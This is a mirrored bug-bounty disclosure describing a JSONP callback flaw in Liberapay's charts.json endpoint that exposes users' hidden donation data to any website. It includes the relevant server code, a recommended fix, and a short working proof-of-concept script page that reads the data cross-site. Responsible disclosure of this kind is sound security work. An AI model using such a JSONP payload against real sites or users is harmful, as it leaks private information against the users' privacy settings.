Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneKapyteinH1:361951
HistoryJun 05, 2018 - 2:23 a.m.

Liberapay: Exploiting JSONP callback on /username/charts.json endpoint leads to information disclosure despite user's privacy settings

2018-06-0502:23:45
kapytein
hackerone.com
36
JSON

Hello!

Vulnerability Details

The /username/charts.json endpoint can return a JSONP callback due to the fact that jsonp_dump is used in the file charts.json.spt. It appears that the content of the JSONP request depends on the authentication of the user. If the user enabled the privacy setting which hides the receiving donation data of the user, a 403 error will be returned unless the user is authenticated.

This happens here:

if participant.hide_receiving:
    if user != participant and not user.is_admin:
        raise response.error(403)

The vulnerable code is here:

[---] application/json via jsonp_dump

Basically, a jsonp_dump is unnecessary in this case (I did not notice a case where cross-domain requests need to be done), and it should be replaced with json_dump instead.

How could this be exploited?

This would eventually allow any site to call the JSONP callback, and receive the receiving donation data of the user, despite it’s privacy settings. This will lead to unwanted information disclosure.

Proof of Concept

<script>
function rip(a) {

alert(JSON.stringify(a[1]));

}
</script>
<script src="https://liberapay.com/~153779/charts.json?callback=rip"></script>

Host this file, visit the site authenticated and it will print out the first row in the JSON Array. If you have not received any donation through LIbrapay so far, an empty JSON array will be returned.

Impact

This will lead to unwanted information disclosure due to the fact that privacy settings of the user will be ignored.

JSON